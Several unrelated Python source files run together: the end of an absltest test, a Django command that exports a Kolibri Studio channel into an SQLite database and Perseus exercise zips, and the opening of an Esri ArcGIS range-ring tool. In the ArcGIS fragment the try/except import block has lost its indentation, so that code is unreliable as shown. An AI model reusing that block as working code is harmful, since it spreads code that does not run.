        self.assertCountEqual(input_map, expected_input_map)
        self.assertCountEqual(output_map, expected_output_map)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
  absltest.main()
| |
import collections
import itertools
import json
import logging as logmodule
import os
import re
import sys
import tempfile
import uuid
import zipfile
from itertools import chain
from django.conf import settings
from django.core.files import File
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import transaction
from django.db.models import Count
from django.db.models import Q
from django.db.models import Sum
from django.template.loader import render_to_string
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from kolibri.content.utils.search import fuzz
from kolibri_content import models as kolibrimodels
from kolibri_content.router import get_active_content_database
from kolibri_content.router import using_content_database
from le_utils.constants import content_kinds
from le_utils.constants import exercises
from le_utils.constants import file_formats
from le_utils.constants import format_presets
from le_utils.constants import roles
from contentcuration import models as ccmodels
from contentcuration.statistics import record_publish_stats
from contentcuration.utils.files import create_thumbnail_from_base64
from contentcuration.utils.files import get_thumbnail_encoding
from contentcuration.utils.parser import extract_value
from contentcuration.utils.parser import load_json_string
logmodule.basicConfig()
# NOTE: the module-level name `logging` shadows the stdlib logging module
# (imported above as `logmodule`); it is this module's logger instance.
logging = logmodule.getLogger(__name__)
# NOTE(review): reload(sys)/setdefaultencoding is a Python 2-only hack to
# force utf-8 default string encoding; it is removed in Python 3 and is
# generally discouraged even on Python 2.
reload(sys)
sys.setdefaultencoding('utf8')
# Directory inside the perseus archive where question images are stored.
PERSEUS_IMG_DIR = exercises.IMG_PLACEHOLDER + "/images"
THUMBNAIL_DIMENSION = 128
# Minimum Kolibri content schema version this export is compatible with.
MIN_SCHEMA_VERSION = "1"
class EarlyExit(BaseException):
    """Signal that publishing stopped early (e.g. no nodes changed).

    Subclasses BaseException, presumably so broad ``except Exception``
    handlers do not swallow it; the command's handler catches it explicitly.
    """

    def __init__(self, message, db_path):
        self.db_path = db_path
        self.message = message
class Command(BaseCommand):
    """Management command that publishes (exports) a channel to a Kolibri DB."""
    def add_arguments(self, parser):
        """Register CLI arguments for the publish command."""
        parser.add_argument('channel_id', type=str)
        parser.add_argument('--force', action='store_true', dest='force', default=False)
        parser.add_argument('--user_id', dest='user_id', default=None)
        parser.add_argument('--force-exercises', action='store_true', dest='force-exercises', default=False)
        # optional argument to send an email to the user when done with exporting channel
        parser.add_argument('--email', action='store_true', default=False)
    def handle(self, *args, **options):
        """Run the export pipeline and finalize the channel's publish state.

        Builds the content database, bumps the version, updates node flags
        and tokens, then optionally emails users. EarlyExit (raised when
        nothing changed and --force is not set) aborts with a warning
        instead of an error.
        """
        # license_id = options['license_id']
        channel_id = options['channel_id']
        force = options['force']
        send_email = options['email']
        user_id = options['user_id']
        force_exercises = options['force-exercises']
        channel = ccmodels.Channel.objects.get(pk=channel_id)
        # license = ccmodels.License.objects.get(pk=license_id)
        try:
            create_content_database(channel_id, force, user_id, force_exercises)
            increment_channel_version(channel)
            mark_all_nodes_as_changed(channel)
            add_tokens_to_channel(channel)
            fill_published_fields(channel)
            # Attributes not getting set for some reason, so just save it here
            channel.main_tree.publishing = False
            channel.main_tree.changed = False
            channel.main_tree.published = True
            channel.main_tree.save()
            if send_email:
                send_emails(channel, user_id)
            # use SQLite backup API to put DB into archives folder.
            # Then we can use the empty db name to have SQLite use a temporary DB (https://www.sqlite.org/inmemorydb.html)
            record_publish_stats(channel)
        except EarlyExit as e:
            logging.warning("Exited early due to {message}.".format(message=e.message))
            self.stdout.write("You can find your database in {path}".format(path=e.db_path))
        # No matter what, make sure publishing is set to False once the run is done
        finally:
            channel.main_tree.publishing = False
            channel.main_tree.save()
def send_emails(channel, user_id):
    """Notify users by email that ``channel`` was published.

    When ``user_id`` is given, only that user is emailed; otherwise every
    editor and viewer of the channel is notified.
    """
    subject = render_to_string('registration/custom_email_subject.txt', {'subject': _('Kolibri Studio Channel Published')})
    if user_id:
        recipients = [ccmodels.User.objects.get(pk=user_id)]
    else:
        # Email all users about updates to channel
        recipients = itertools.chain(channel.editors.all(), channel.viewers.all())
    for recipient in recipients:
        message = render_to_string('registration/channel_published_email.txt', {'channel': channel, 'user': recipient})
        recipient.email_user(subject, message, settings.DEFAULT_FROM_EMAIL)
def create_content_database(channel_id, force, user_id, force_exercises):
    """Export the channel's main tree into a fresh Kolibri sqlite database.

    Unless ``force`` is set, raises EarlyExit when no node has changed.
    All DB writes inside the ``using_content_database`` block are routed to
    the temporary sqlite file, which is copied into storage at the end.
    """
    channel = ccmodels.Channel.objects.get(pk=channel_id)
    # increment the channel version
    if not force:
        raise_if_nodes_are_all_unchanged(channel)
    fh, tempdb = tempfile.mkstemp(suffix=".sqlite3")
    with using_content_database(tempdb):
        # Flag the tree as mid-publish before any long-running work starts.
        channel.main_tree.publishing = True
        channel.main_tree.save()
        prepare_export_database(tempdb)
        map_channel_to_kolibri_channel(channel)
        map_content_nodes(channel.main_tree, channel.language, channel.id, channel.name, user_id=user_id, force_exercises=force_exercises)
        map_prerequisites(channel.main_tree)
        save_export_database(channel_id)
def create_kolibri_license_object(ccnode):
    """Get or create the exported License row for ``ccnode``'s license.

    Custom licenses take the node's own description; standard licenses take
    the canonical description from the license record. Returns the
    ``(license, created)`` tuple from ``get_or_create``.
    """
    src_license = ccnode.license
    if src_license.is_custom:
        description = ccnode.license_description
    else:
        description = src_license.license_description
    return kolibrimodels.License.objects.get_or_create(
        license_name=src_license.license_name,
        license_description=description
    )
def increment_channel_version(channel):
    """Bump the channel version, stamp the publish time, and persist."""
    channel.version = channel.version + 1
    channel.last_published = timezone.now()
    channel.save()
def assign_license_to_contentcuration_nodes(channel, license):
    # Apply the given license to every node in the channel's tree family
    # with a single bulk UPDATE.
    channel.main_tree.get_family().update(license_id=license.pk)
def map_content_nodes(root_node, default_language, channel_id, channel_name, user_id=None, force_exercises=False):
    # make sure we process nodes higher up in the tree first, or else when we
    # make mappings the parent nodes might not be there
    node_queue = collections.deque()
    node_queue.append(root_node)
    def queue_get_return_none_when_empty():
        # Sentinel-style popper so the loop below can use two-argument iter().
        try:
            return node_queue.popleft()
        except IndexError:
            return None
    # kolibri_license = kolibrimodels.License.objects.get(license_name=license.license_name)
    with transaction.atomic():
        with ccmodels.ContentNode.objects.delay_mptt_updates():
            # Breadth-first walk: parents are always mapped before children.
            for node in iter(queue_get_return_none_when_empty, None):
                logging.debug("Mapping node with id {id}".format(
                    id=node.pk))
                # Skip subtrees that contain nothing but topics (no content).
                if node.get_descendants(include_self=True).exclude(kind_id=content_kinds.TOPIC).exists():
                    children = (node.children.all())
                    node_queue.extend(children)
                    kolibrinode = create_bare_contentnode(node, default_language, channel_id, channel_name)
                    if node.kind.kind == content_kinds.EXERCISE:
                        exercise_data = process_assessment_metadata(node, kolibrinode)
                        # Regenerate the perseus file when forced, when the
                        # node changed, or when no exercise file exists yet.
                        if force_exercises or node.changed or not node.files.filter(preset_id=format_presets.EXERCISE).exists():
                            create_perseus_exercise(node, kolibrinode, exercise_data, user_id=user_id)
                    create_associated_file_objects(kolibrinode, node)
                    map_tags_to_node(kolibrinode, node)
def create_bare_contentnode(ccnode, default_language, channel_id, channel_name):
    """Create/update the exported ContentNode row for ``ccnode``.

    Only node metadata is written here; files, tags, and assessment data are
    attached by the other mapping helpers.
    """
    logging.debug("Creating a Kolibri contentnode for instance id {}".format(
        ccnode.node_id))
    kolibri_license = None
    if ccnode.license is not None:
        kolibri_license = create_kolibri_license_object(ccnode)[0]
    language = None
    if ccnode.language or default_language:
        # Fall back to the channel default when the node has no language.
        language, _new = get_or_create_language(ccnode.language or default_language)
    kolibrinode, is_new = kolibrimodels.ContentNode.objects.update_or_create(
        pk=ccnode.node_id,
        defaults={
            'kind': ccnode.kind.kind,
            # The root node takes the channel name as its title.
            'title': ccnode.title if ccnode.parent else channel_name,
            'content_id': ccnode.content_id,
            'channel_id': channel_id,
            'author': ccnode.author or "",
            'description': ccnode.description,
            'sort_order': ccnode.sort_order,
            'license_owner': ccnode.copyright_holder or "",
            'license': kolibri_license,
            'available': ccnode.get_descendants(include_self=True).exclude(kind_id=content_kinds.TOPIC).exists(), # Hide empty topics
            'stemmed_metaphone': ' '.join(fuzz(ccnode.title + ' ' + ccnode.description)),
            'lang': language,
            'license_name': kolibri_license.license_name if kolibri_license is not None else None,
            'license_description': kolibri_license.license_description if kolibri_license is not None else None,
            'coach_content': ccnode.role_visibility == roles.COACH,
        }
    )
    if ccnode.parent:
        logging.debug("Associating {child} with parent {parent}".format(
            child=kolibrinode.pk,
            parent=ccnode.parent.node_id
        ))
        # Parent rows exist already because nodes are mapped top-down.
        kolibrinode.parent = kolibrimodels.ContentNode.objects.get(pk=ccnode.parent.node_id)
        kolibrinode.save()
    logging.debug("Created Kolibri ContentNode with node id {}".format(ccnode.node_id))
    logging.debug("Kolibri node count: {}".format(kolibrimodels.ContentNode.objects.all().count()))
    return kolibrinode
def get_or_create_language(language):
    """Mirror a Studio language record into the export database.

    Returns the ``(language, created)`` pair from ``get_or_create``.
    """
    # Some language records expose ``native_name`` instead of ``lang_name``.
    display_name = language.lang_name if hasattr(language, 'lang_name') else language.native_name
    return kolibrimodels.Language.objects.get_or_create(
        id=language.pk,
        lang_code=language.lang_code,
        lang_subcode=language.lang_subcode,
        lang_name=display_name,
        lang_direction=language.lang_direction
    )
def create_associated_thumbnail(ccnode, ccfilemodel):
    """
    Gets the appropriate thumbnail for export (uses or generates a base64 encoding)
    Args:
        ccnode (<ContentNode>): node to derive thumbnail from (if encoding is provided)
        ccfilemodel (<File>): file to get thumbnail from if no encoding is available
    Returns <File> model of encoded, resized thumbnail
    """
    encoding = None
    try:
        # thumbnail_encoding is JSON text; reuse the cached base64 payload
        # when present.
        encoding = ccnode.thumbnail_encoding and load_json_string(ccnode.thumbnail_encoding).get('base64')
    except ValueError:
        logging.error("ERROR: node thumbnail is not in correct format ({}: {})".format(ccnode.id, ccnode.thumbnail_encoding))
        return
    # Save the encoding if it doesn't already have an encoding
    if not encoding:
        try:
            encoding = get_thumbnail_encoding(str(ccfilemodel))
        except IOError:
            # ImageMagick may raise an IOError if the file is not a thumbnail. Catch that then just return early.
            logging.error("ERROR: cannot identify the thumbnail ({}: {})".format(ccnode.id, ccnode.thumbnail_encoding))
            return
        # Cache the freshly computed encoding back onto the node.
        ccnode.thumbnail_encoding = json.dumps({
            "base64": encoding,
            "points": [],
            "zoom": 0,
        })
        ccnode.save()
    return create_thumbnail_from_base64(
        encoding,
        uploaded_by=ccfilemodel.uploaded_by,
        file_format_id=ccfilemodel.file_format_id,
        preset_id=ccfilemodel.preset_id
    )
def create_associated_file_objects(kolibrinode, ccnode):
    """Mirror the node's files into the export DB as LocalFile/File rows."""
    logging.debug("Creating LocalFile and File objects for Node {}".format(kolibrinode.id))
    # Exercise images/graphies are excluded: they ship inside the perseus zip.
    for ccfilemodel in ccnode.files.exclude(Q(preset_id=format_presets.EXERCISE_IMAGE) | Q(preset_id=format_presets.EXERCISE_GRAPHIE)):
        preset = ccfilemodel.preset
        fformat = ccfilemodel.file_format
        if ccfilemodel.language:
            # Make sure the file's language exists in the export DB first.
            get_or_create_language(ccfilemodel.language)
        if preset.thumbnail:
            # Swap in an encoded/resized thumbnail file when one can be built.
            ccfilemodel = create_associated_thumbnail(ccnode, ccfilemodel) or ccfilemodel
        # LocalFile is keyed by checksum so identical content is deduplicated.
        kolibrilocalfilemodel, new = kolibrimodels.LocalFile.objects.get_or_create(
            pk=ccfilemodel.checksum,
            defaults={
                'extension': fformat.extension,
                'file_size': ccfilemodel.file_size,
            }
        )
        kolibrimodels.File.objects.create(
            pk=ccfilemodel.pk,
            checksum=ccfilemodel.checksum,
            extension=fformat.extension,
            available=True, # TODO: Set this to False, once we have availability stamping implemented in Kolibri
            file_size=ccfilemodel.file_size,
            contentnode=kolibrinode,
            preset=preset.pk,
            supplementary=preset.supplementary,
            lang_id=ccfilemodel.language and ccfilemodel.language.pk,
            thumbnail=preset.thumbnail,
            priority=preset.order,
            local_file=kolibrilocalfilemodel,
        )
def create_perseus_exercise(ccnode, kolibrinode, exercise_data, user_id=None):
    """Build the .perseus zip for an exercise node and attach it as a File.

    Args:
        ccnode: contentcuration exercise node to export.
        kolibrinode: the mapped Kolibri node (unused here; kept for symmetry
            with the other mapping helpers).
        exercise_data: metadata dict from process_assessment_metadata.
        user_id: user recorded as the uploader of the generated file.
    """
    logging.debug("Creating Perseus Exercise for Node {}".format(ccnode.title))
    filename = "{0}.{ext}".format(ccnode.title, ext=file_formats.PERSEUS)
    temppath = None
    try:
        with tempfile.NamedTemporaryFile(suffix="zip", delete=False) as tempf:
            temppath = tempf.name
            create_perseus_zip(ccnode, exercise_data, tempf)
            file_size = tempf.tell()
            tempf.flush()
            # Replace any previously generated exercise file for this node.
            ccnode.files.filter(preset_id=format_presets.EXERCISE).delete()
            assessment_file_obj = ccmodels.File.objects.create(
                # Open in binary mode: the zip archive is not text, and text
                # mode would corrupt it on platforms that translate newlines.
                file_on_disk=File(open(temppath, 'rb'), name=filename),
                contentnode=ccnode,
                file_format_id=file_formats.PERSEUS,
                preset_id=format_presets.EXERCISE,
                original_filename=filename,
                file_size=file_size,
                uploaded_by_id=user_id,
            )
            logging.debug("Created exercise for {0} with checksum {1}".format(ccnode.title, assessment_file_obj.checksum))
    finally:
        # Always remove the temp file, even when export fails.
        temppath and os.unlink(temppath)
def process_assessment_metadata(ccnode, kolibrinode):
    """Derive mastery-model data for an exercise and store AssessmentMetaData.

    Returns the updated exercise_data dict used to render the perseus file.
    """
    # Get mastery model information, set to default if none provided
    assessment_items = ccnode.assessment_items.all().order_by('order')
    # extra_fields holds the exercise configuration as a JSON string.
    exercise_data = json.loads(ccnode.extra_fields) if ccnode.extra_fields else {}
    randomize = exercise_data.get('randomize') if exercise_data.get('randomize') is not None else True
    assessment_item_ids = [a.assessment_id for a in assessment_items]
    mastery_model = {'type': exercise_data.get('mastery_model') or exercises.M_OF_N}
    if mastery_model['type'] == exercises.M_OF_N:
        # Default m and n to at most 5 (or the question count), minimum 1.
        mastery_model.update({'n': exercise_data.get('n') or min(5, assessment_items.count()) or 1})
        mastery_model.update({'m': exercise_data.get('m') or min(5, assessment_items.count()) or 1})
    elif mastery_model['type'] == exercises.DO_ALL:
        mastery_model.update({'n': assessment_items.count() or 1, 'm': assessment_items.count() or 1})
    elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_2:
        mastery_model.update({'n': 2, 'm': 2})
    elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_3:
        mastery_model.update({'n': 3, 'm': 3})
    elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_5:
        mastery_model.update({'n': 5, 'm': 5})
    elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_10:
        mastery_model.update({'n': 10, 'm': 10})
    # Every legacy model is normalized to an equivalent m-of-n for export;
    # the original type is preserved in legacy_mastery_model.
    exercise_data.update({
        'mastery_model': exercises.M_OF_N,
        'legacy_mastery_model': mastery_model['type'],
        'randomize': randomize,
        'n': mastery_model.get('n'),
        'm': mastery_model.get('m'),
        'all_assessment_items': assessment_item_ids,
        # true/false questions are exported as single-selection questions.
        'assessment_mapping': {a.assessment_id: a.type if a.type != 'true_false' else exercises.SINGLE_SELECTION.decode('utf-8') for a in assessment_items},
    })
    kolibrimodels.AssessmentMetaData.objects.create(
        id=uuid.uuid4(),
        contentnode=kolibrinode,
        assessment_item_ids=json.dumps(assessment_item_ids),
        number_of_assessments=assessment_items.count(),
        mastery_model=json.dumps(mastery_model),
        randomize=randomize,
        is_manipulable=ccnode.kind_id == content_kinds.EXERCISE,
    )
    return exercise_data
def create_perseus_zip(ccnode, exercise_data, write_to_path):
    """Write the perseus archive: exercise.json, images, per-question JSON."""
    with zipfile.ZipFile(write_to_path, "w") as zf:
        try:
            exercise_context = {
                'exercise': json.dumps(exercise_data, sort_keys=True, indent=4)
            }
            exercise_result = render_to_string('perseus/exercise.json', exercise_context)
            write_to_zipfile("exercise.json", exercise_result, zf)
            for question in ccnode.assessment_items.prefetch_related('files').all().order_by('order'):
                try:
                    # Bundle the question's regular image files (deduplicated
                    # by archive name).
                    for image in question.files.filter(preset_id=format_presets.EXERCISE_IMAGE).order_by('checksum'):
                        image_name = "images/{}.{}".format(image.checksum, image.file_format_id)
                        if image_name not in zf.namelist():
                            with storage.open(ccmodels.generate_object_storage_name(image.checksum, str(image)), 'rb') as content:
                                write_to_zipfile(image_name, content.read(), zf)
                    # Graphie files store the SVG and its JSON data in one
                    # blob separated by GRAPHIE_DELIMITER; split them into
                    # two archive entries.
                    for image in question.files.filter(preset_id=format_presets.EXERCISE_GRAPHIE).order_by('checksum'):
                        svg_name = "images/{0}.svg".format(image.original_filename)
                        json_name = "images/{0}-data.json".format(image.original_filename)
                        if svg_name not in zf.namelist() or json_name not in zf.namelist():
                            with storage.open(ccmodels.generate_object_storage_name(image.checksum, str(image)), 'rb') as content:
                                content = content.read()
                                content = content.split(exercises.GRAPHIE_DELIMITER)
                                write_to_zipfile(svg_name, content[0], zf)
                                write_to_zipfile(json_name, content[1], zf)
                    write_assessment_item(question, zf)
                except Exception as e:
                    # A broken question is logged and skipped so one bad item
                    # does not abort the whole publish.
                    logging.error("Publishing error: {}".format(str(e)))
        finally:
            # NOTE(review): redundant -- the with-statement already closes zf.
            zf.close()
def write_to_zipfile(filename, content, zf):
    """Add ``content`` to the archive under ``filename``.

    Entries use a constant timestamp and STORED (uncompressed) mode,
    presumably so archives built from identical content are byte-identical.
    """
    entry = zipfile.ZipInfo(filename, date_time=(2013, 3, 14, 1, 59, 26))
    entry.compress_type = zipfile.ZIP_STORED
    entry.create_system = 0
    entry.comment = "Perseus file generated during export process".encode()
    zf.writestr(entry, content)
def write_assessment_item(assessment_item, zf):
    """Render one assessment item to <assessment_id>.json inside the zip.

    Raises:
        TypeError: if the question type has no perseus template.
    """
    if assessment_item.type == exercises.MULTIPLE_SELECTION:
        template = 'perseus/multiple_selection.json'
    elif assessment_item.type == exercises.SINGLE_SELECTION or assessment_item.type == 'true_false':
        # true/false shares the multiple-selection template.
        template = 'perseus/multiple_selection.json'
    elif assessment_item.type == exercises.INPUT_QUESTION:
        template = 'perseus/input_question.json'
    elif assessment_item.type == exercises.PERSEUS_QUESTION:
        template = 'perseus/perseus_question.json'
    else:
        raise TypeError("Unrecognized question type on item {}".format(assessment_item.assessment_id))
    question = process_formulas(assessment_item.question)
    question, question_images = process_image_strings(question, zf)
    answer_data = json.loads(assessment_item.answers)
    for answer in answer_data:
        if assessment_item.type == exercises.INPUT_QUESTION:
            answer['answer'] = extract_value(answer['answer'])
        else:
            answer['answer'] = answer['answer'].replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR)
            answer['answer'] = process_formulas(answer['answer'])
            # In case perseus doesn't support =wxh syntax, use below code
            answer['answer'], answer_images = process_image_strings(answer['answer'], zf)
            answer.update({'images': answer_images})
    answer_data = list(filter(lambda a: a['answer'] or a['answer'] == 0, answer_data)) # Filter out empty answers, but not 0
    hint_data = json.loads(assessment_item.hints)
    for hint in hint_data:
        hint['hint'] = process_formulas(hint['hint'])
        hint['hint'], hint_images = process_image_strings(hint['hint'], zf)
        hint.update({'images': hint_images})
    # NOTE(review): two-argument sorted(iterable, cmp) and the cmp() builtin
    # are Python 2 only; this module cannot run under Python 3 unchanged.
    context = {
        'question': question,
        'question_images': question_images,
        'answers': sorted(answer_data, lambda x, y: cmp(x.get('order'), y.get('order'))),
        'multiple_select': assessment_item.type == exercises.MULTIPLE_SELECTION,
        'raw_data': assessment_item.raw_data.replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR),
        'hints': sorted(hint_data, lambda x, y: cmp(x.get('order'), y.get('order'))),
        'randomize': assessment_item.randomize,
    }
    result = render_to_string(template, context).encode('utf-8', "ignore")
    write_to_zipfile("{0}.json".format(assessment_item.assessment_id), result, zf)
def process_formulas(content):
    # Collapse $$...$$ to $...$: the regex matches the outer pair of dollar
    # signs and keeps the inner "$...$" capture.
    # NOTE(review): ur'' literals are Python 2 only; this module will not
    # parse under Python 3.
    for match in re.finditer(ur'\$(\$.+\$)\$', content):
        content = content.replace(match.group(0), match.group(1))
    return content
def process_image_strings(content, zf):
    """Rewrite markdown image references and pack the images into the zip.

    Returns (content, image_list) where image_list carries name/width/height
    dicts for images that specified an explicit "=WxH" size suffix.
    """
    image_list = []
    content = content.replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR)
    # NOTE(review): ur'' literals are Python 2 only.
    for match in re.finditer(ur'!\[(?:[^\]]*)]\(([^\)]+)\)', content):
        # Group 1: image path; groups 2/3: optional "=WxH" dimensions.
        img_match = re.search(ur'(.+/images/[^\s]+)(?:\s=([0-9\.]+)x([0-9\.]+))*', match.group(1))
        if img_match:
            # Add any image files that haven't been written to the zipfile
            filename = img_match.group(1).split('/')[-1]
            checksum, ext = os.path.splitext(filename)
            image_name = "images/{}.{}".format(checksum, ext[1:])
            if image_name not in zf.namelist():
                with storage.open(ccmodels.generate_object_storage_name(checksum, filename), 'rb') as imgfile:
                    write_to_zipfile(image_name, imgfile.read(), zf)
            # Add resizing data
            if img_match.group(2) and img_match.group(3):
                image_data = {'name': img_match.group(1)}
                image_data.update({'width': float(img_match.group(2))})
                image_data.update({'height': float(img_match.group(3))})
                image_list.append(image_data)
            # Strip the "=WxH" suffix from the reference left in the content.
            content = content.replace(match.group(1), img_match.group(1))
    return content, image_list
def map_prerequisites(root_node):
    """Copy prerequisite links for the published tree into the export DB."""
    relations = ccmodels.PrerequisiteContentRelationship.objects.filter(
        prerequisite__tree_id=root_node.tree_id
    ).values('prerequisite__node_id', 'target_node__node_id')
    for relation in relations:
        target_node = kolibrimodels.ContentNode.objects.get(pk=relation['target_node__node_id'])
        target_node.has_prerequisite.add(relation['prerequisite__node_id'])
def map_channel_to_kolibri_channel(channel):
    """Create the ChannelMetadata row for the channel in the export DB."""
    logging.debug("Generating the channel metadata.")
    # Refresh the channel's thumbnail encoding before exporting it.
    channel.icon_encoding = convert_channel_thumbnail(channel)
    channel.save()
    kolibri_channel = kolibrimodels.ChannelMetadata.objects.create(
        id=channel.id,
        name=channel.name,
        description=channel.description,
        version=channel.version + 1, # Need to save as version being published, not current version
        thumbnail=channel.icon_encoding,
        root_pk=channel.main_tree.node_id,
        root_id=channel.main_tree.node_id,
        min_schema_version=MIN_SCHEMA_VERSION, # Need to modify Kolibri so we can import this without importing models
    )
    logging.info("Generated the channel metadata.")
    return kolibri_channel
def convert_channel_thumbnail(channel):
    """Return the base64 encoding of the channel's thumbnail.

    Static/placeholder thumbnails yield "". A cached encoding on the channel
    is preferred; otherwise the encoding is generated from the thumbnail.
    """
    if not channel.thumbnail or channel.thumbnail == '' or 'static' in channel.thumbnail:
        return ""
    if channel.thumbnail_encoding:
        try:
            thumbnail_data = channel.thumbnail_encoding
            # NOTE(review): sibling code (create_associated_thumbnail) treats
            # thumbnail_encoding as JSON text and parses it with
            # load_json_string; calling .get() here assumes it is already a
            # dict. If it is a str, this raises AttributeError, which the
            # ValueError handler below does not catch -- confirm the field's
            # actual type.
            if thumbnail_data.get("base64"):
                return thumbnail_data["base64"]
        except ValueError:
            logging.error("ERROR: channel thumbnail is not in correct format ({}: {})".format(channel.id, channel.thumbnail_encoding))
    return get_thumbnail_encoding(channel.thumbnail)
def map_tags_to_node(kolibrinode, ccnode):
    """ map_tags_to_node: assigns tags to nodes (creates fk relationship)
        Args:
            kolibrinode (kolibri.models.ContentNode): node to map tag to
            ccnode (contentcuration.models.ContentNode): node with tags to map
        Returns: None
    """
    tags_to_add = []
    for tag in ccnode.tags.all():
        # Mirror each contentcuration tag into the export database.
        t, _new = kolibrimodels.ContentTag.objects.get_or_create(pk=tag.pk, tag_name=tag.tag_name)
        tags_to_add.append(t)
    # NOTE(review): direct assignment to a many-to-many manager only works on
    # Django < 2.0; newer versions require kolibrinode.tags.set(tags_to_add).
    # Confirm the Django version in use before changing.
    kolibrinode.tags = tags_to_add
    kolibrinode.save()
def prepare_export_database(tempdb):
    """Reset the active export database and apply the content migrations.

    WARNING: flush wipes every row in the active content database so the
    publish run starts from a clean slate.
    """
    export_db = get_active_content_database()
    call_command("flush", "--noinput", database=export_db)  # clears the db!
    call_command(
        "migrate",
        "content",
        run_syncdb=True,
        database=export_db,
        noinput=True,
    )
    logging.info("Prepared the export database.")
def raise_if_nodes_are_all_unchanged(channel):
    """Abort the publish early when nothing in the channel tree changed.

    Raises:
        EarlyExit: when no node in the channel's main tree has changed=True.
    """
    logging.debug("Checking if we have any changed nodes.")
    changed_models = channel.main_tree.get_family().filter(changed=True)
    if changed_models.count() > 0:
        logging.info("Some nodes are changed.")
        return
    logging.debug("No nodes have been changed!")
    raise EarlyExit(message="No models changed!", db_path=None)
def mark_all_nodes_as_changed(channel):
    """Update publish flags on every node in the channel's main tree.

    NOTE(review): despite the function name and log messages, this sets
    changed=False (and published=True) on the whole tree -- i.e. it marks
    nodes as published-and-unchanged after a publish run. Confirm the name
    is a historical artifact before relying on it.
    """
    logging.debug("Marking all nodes as changed.")
    channel.main_tree.get_family().update(changed=False, published=True)
    logging.info("Marked all nodes as changed.")
def save_export_database(channel_id):
    """Copy the active (temporary) export database into permanent storage.

    Args:
        channel_id: id of the channel; becomes the target file name
            "<channel_id>.sqlite3" under settings.DB_ROOT.
    """
    logging.debug("Saving export database")
    current_export_db_location = get_active_content_database()
    target_export_db_location = os.path.join(settings.DB_ROOT, "{id}.sqlite3".format(id=channel_id))
    # BUG FIX: the export database is a binary SQLite file, so it must be
    # opened in binary mode. Text mode would attempt to decode the bytes and
    # raise UnicodeDecodeError (or corrupt the copy) on Python 3.
    with open(current_export_db_location, 'rb') as currentf:
        storage.save(target_export_db_location, currentf)
    logging.info("Successfully copied to {}".format(target_export_db_location))
def add_tokens_to_channel(channel):
    """Ensure the channel has a primary secret token, creating one if absent."""
    has_primary = channel.secret_tokens.filter(is_primary=True).exists()
    if has_primary:
        return
    logging.info("Generating tokens for the channel.")
    channel.make_token()
def fill_published_fields(channel):
    """Cache aggregate statistics about the published tree on the channel.

    Computes, over the published descendants of channel.main_tree:
    total resource count (non-topic nodes), per-kind counts (stored as JSON),
    total distinct file size, and the set of included languages (taken from
    both nodes and their files). Saves the channel at the end.
    """
    published_nodes = channel.main_tree.get_descendants().filter(published=True).prefetch_related('files')
    channel.total_resource_count = published_nodes.exclude(kind_id=content_kinds.TOPIC).count()
    # Per-kind resource counts, serialized to JSON for storage in a text field.
    channel.published_kind_count = json.dumps(list(published_nodes.values('kind_id').annotate(count=Count('kind_id')).order_by('kind_id')))
    # Distinct (checksum, size) pairs so files shared by several nodes are
    # only counted once; default to 0 when there are no files at all.
    channel.published_size = published_nodes.values('files__checksum', 'files__file_size').distinct(
    ).aggregate(resource_size=Sum('files__file_size'))['resource_size'] or 0
    node_languages = published_nodes.exclude(language=None).values_list('language', flat=True)
    file_languages = published_nodes.values_list('files__language', flat=True)
    language_list = list(set(chain(node_languages, file_languages)))
    for lang in language_list:
        # Skip None entries coming from files that carry no language.
        if lang:
            channel.included_languages.add(lang)
    channel.save()
| |
# coding: utf-8
'''
------------------------------------------------------------------------------
Copyright 2018 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------------------------------------------
==================================================
DistanceAndDirectionTools.py
--------------------------------------------------
requirements: ArcGIS 10.3.1+, ArcGIS Pro 1.4+, Python 2.7 or Python 3.5+
author: ArcGIS Solutions
contact: support@esri.com
company: Esri
==================================================
description:
Distance and Direction Toolset Tools
==================================================
'''
import os
import sys
import arcpy
try:
from . import RangeRingUtils
except ImportError:
import RangeRingUtils
# ----------------------------------------------------------------------------------
# RangeRingsFromInterval Tool
# ----------------------------------------------------------------------------------
class RangeRingsFromInterval(object):
    """Geoprocessing tool: creates evenly spaced concentric range rings
    (and optional radial lines) around each input center feature."""
    def __init__(self):
        # Tool metadata displayed in the ArcGIS toolbox UI.
        self.label = u'Range Rings From Interval'
        self.description = u'Create a concentric circle from a center, with a number of rings, and the distance between rings.'
        self.category = u'Distance and Direction'
        self.canRunInBackground = False
    def getParameterInfo(self):
        """Declare the tool's eight parameters, in the order execute() reads them."""
        # Input_Center_Features
        param_1 = arcpy.Parameter()
        param_1.name = u'Input_Center_Features'
        param_1.displayName = u'Input Center Features'
        param_1.parameterType = 'Required'
        param_1.direction = 'Input'
        param_1.datatype = u'Feature Set' # Same as u'GPFeatureRecordSetLayer'
        # Set the Feature Set schema from the template layer file
        input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
                                             "layers",
                                             "RangeRingInputObserversGDB.lyr")
        param_1.value = input_layer_file_path
        # Number_of_Rings
        param_2 = arcpy.Parameter()
        param_2.name = u'Number_of_Rings'
        param_2.displayName = u'Number of Rings'
        param_2.parameterType = 'Required'
        param_2.direction = 'Input'
        param_2.datatype = u'Long'
        param_2.value = u'4'
        # Interval_Between_Rings
        param_3 = arcpy.Parameter()
        param_3.name = u'Interval_Between_Rings'
        param_3.displayName = u'Interval Between Rings'
        param_3.parameterType = 'Required'
        param_3.direction = 'Input'
        param_3.datatype = u'Double'
        param_3.value = u'100'
        # Distance_Units
        param_4 = arcpy.Parameter()
        param_4.name = u'Distance_Units'
        param_4.displayName = u'Distance Units'
        param_4.parameterType = 'Required'
